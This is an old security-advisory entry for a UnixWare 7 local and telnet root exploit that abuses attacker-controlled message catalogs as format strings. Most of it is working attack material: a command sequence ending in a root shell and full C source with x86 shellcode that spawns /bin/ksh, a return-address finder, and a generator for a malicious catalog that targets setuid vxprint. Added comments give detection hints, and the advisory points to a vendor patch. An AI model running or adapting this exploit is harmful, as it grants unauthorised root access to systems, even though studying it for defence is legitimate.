12th Feb 2002 [SBWID-5088]
COMMAND
Unixware Message catalog exploit
SYSTEMS AFFECTED
Unixware 7.x
PROBLEM
jGgM posted multiple UnixWare 7 root exploits based on "message
catalogs":
An attacker can modify a message catalog and use it to build a format string exploit.
Exploit :
=======
$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
...........(wait 30 minutes ). ......
# id
uid=0(root) gid=3(sys) ......................
This can be used against any UnixWare 7 setuid/setgid command.
It can also be used against telnetd and login:
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
#
Here is the code.
------------------ expshell.c ------------------
#include <stdio.h>
/*
 * Payload string that expshell's main() below places in the environment
 * as EGG. It is a long run of 0x90 (x86 NOP) bytes followed by the short
 * code sequence annotated below and the literal "/bin/ksh". For detection
 * purposes: a process environment containing a long run of 0x90 bytes
 * together with LC_MESSAGES pointing at a user-writable directory is a
 * clear indicator of this technique.
 */
char shellcode[]=
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\xeb\\x1a\" /* jmp <shellcode+28> */
\"\\x33\\xd2\" /* xorl %edx,%edx */
\"\\x58\" /* popl %eax */
\"\\x8d\\x78\\x14\" /* leal 0x14(%eax),%edi */
\"\\x57\" /* pushl %edi */
\"\\x50\" /* pushl %eax */
\"\\xab\" /* stosl %eax,%es:(%edi) */
\"\\x92\" /* xchgl %eax,%edx */
\"\\xab\" /* stosl %eax,%es:(%edi) */
\"\\x88\\x42\\x08\" /* movb %al,0x8(%edx) */
\"\\x83\\xef\\x3b\" /* subl $0x3b,%edi */
\"\\xb0\\x9a\" /* movb $0x9a,%al */
\"\\xab\" /* stosl %eax,%es:(%edi) */
\"\\x47\" /* incl %edi */
\"\\xb0\\x07\" /* movb $0x07,%al */
\"\\xab\" /* stosl %eax,%es:(%edi) */
\"\\xb0\\x0b\" /* movb $0x0b,%al */
\"\\xe8\\xe1\\xff\\xff\\xff\" /* call <shellcode+2> */
\"/bin/ksh\"
;
/*
 * Entry point of expshell. Copies the payload above into the environment
 * as EGG, sets LC_MESSAGES to /tmp (a directory an unprivileged user can
 * write to, see the mkdir("/tmp/LC_MESSAGES", ...) in fmt_exp.c), and then
 * starts an interactive tcsh that inherits both variables; getret and
 * fmt_exp are meant to be run from that shell.
 *
 * Notes on the listing as given:
 *  - The return type is omitted (implicit int) and <stdlib.h> is not
 *    included, so putenv() and system() are implicitly declared.
 *  - argc/argv are unused.
 *  - putenv() retains a pointer to buff instead of copying it; that is
 *    harmless only because main() never returns before system() finishes.
 * Mitigation from the defender's side: a setuid/setgid program must not
 * honour a caller-supplied LC_MESSAGES directory; the vendor patch in the
 * SOLUTION section addresses this.
 */
main(int argc, char *argv[])
{
char buff[1024];
/* sprintf() is unbounded, but shellcode is a fixed constant of roughly
 * 300 bytes with no embedded NUL, so "EGG=" + payload fits in 1024. */
sprintf(buff, \"EGG=%s\", shellcode);
putenv(buff);
putenv(\"LC_MESSAGES=/tmp\");
/* Return value of system() is ignored; the program ends when the shell exits. */
system(\"/usr/bin/tcsh\");
}
---------------------------------------------------------------
---------------- getret.c --------------------
/*
 * Entry point of getret. Prints the address of the EGG environment string
 * in this process as "e=<hex>", which the procedure above then hands to
 * fmt_exp. The value is only meaningful if the target process has the same
 * environment layout as this one (hence the dependence on running it from
 * the shell started by expshell).
 *
 * Notes on the listing as given: the return type is implicit int,
 * <stdio.h>/<stdlib.h> are not included (printf() and getenv() are
 * implicitly declared), and a NULL result from getenv() (EGG not set) is
 * printed unchecked rather than reported as an error.
 */
main()
{
char *a;
a = getenv(\"EGG\");
printf (\"e=%p\\n\", a);
}
-----------------------------------------------
---------------- fmt_exp.c -----------------------------
#include <stdio.h>
#include \"shellcode.h\"
/* This is the base of the format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268
/*
 * Entry point of fmt_exp. Writes a message-catalog source file ("testdef",
 * in the current directory) containing `line` entries, each made of `n`
 * "%10x" conversions followed by one "%<g_len>x%n"; compiles it with mkmsgs,
 * moves the result to /tmp/LC_MESSAGES/vxvm.mesg and finally executes
 * /usr/sbin/vxprint. Per the advisory text above, vxprint is expected to pick
 * the catalog up through the LC_MESSAGES=/tmp setting made by expshell — this
 * function itself does not set that variable.
 *
 * Arguments: argv[1] is a hexadecimal address (the value printed by getret);
 * argv[2] is an optional decimal offset. g_len = argv[1] - BASE + offset.
 *
 * Defects in the listing as given:
 *  - <stdlib.h>, <unistd.h> and <sys/stat.h> are not included, so exit(),
 *    atol(), strtol(), mkdir() and execl() are implicitly declared.
 *  - strtol(retaddr, NULL, 16) is not checked; unparsable input silently
 *    becomes 0.
 *  - fprintf(), fclose(), system() and mkdir() results are ignored, so a
 *    failed step (e.g. mkmsgs not present) goes unnoticed.
 *  - g_len is a long but is printed with "%x" (format/type mismatch), and the
 *    value printed is the adjusted g_len, not the address the user passed.
 *  - Nothing from shellcode.h is referenced in this function.
 * For defenders, the artefact to look for is a compiled catalog under a
 * user-writable LC_MESSAGES directory whose entries consist of format
 * directives rather than text.
 */
main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;   /* line: entries written; n: "%10x" conversions per entry */
if(argc < 2 || argc > 3) {
printf(\"Usage: %s ret-address offset\\n\", argv[0]);
exit(1);
}
retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
g_len = strtol(retaddr, NULL, 16);
/* BASE (see #define above) is subtracted first, then the user offset added. */
g_len -= BASE;
g_len += offset;
fp = fopen(\"testdef\", \"w+\");
if(fp == NULL) {
fprintf(stderr, \"can not open file.\\n\"); exit(1);
}
/* Every entry has the same shape; "%%" in the format emits a literal '%'. */
for(count=0; count<line; count++) {
for(count2=0; count2<n; count2++)
fprintf(fp, \"%%10x\");
fprintf(fp, \"%%%dx%%n\\n\", g_len);
}
fclose(fp);
/* Stale output from a previous run would otherwise be reused. */
remove(\"testout\");
system(\"mkmsgs testdef testout\");
mkdir(\"/tmp/LC_MESSAGES\", 0755);
/* NOTE: the string literal below is wrapped across two lines in this
 * transcription; presumably it is a single line in the original source. */
system(\"mv
testout /tmp/LC_MESSAGES/vxvm.mesg\");
printf(\"ret addr = 0x%x\\n\", g_len);
/* this, also can any set uid command */
/* execl() only returns on failure; that case is not handled. */
execl(\"/usr/sbin/vxprint\", \"vxprint\", \"---\", NULL);
}
SOLUTION
Caldera has posted a patch; see Caldera support.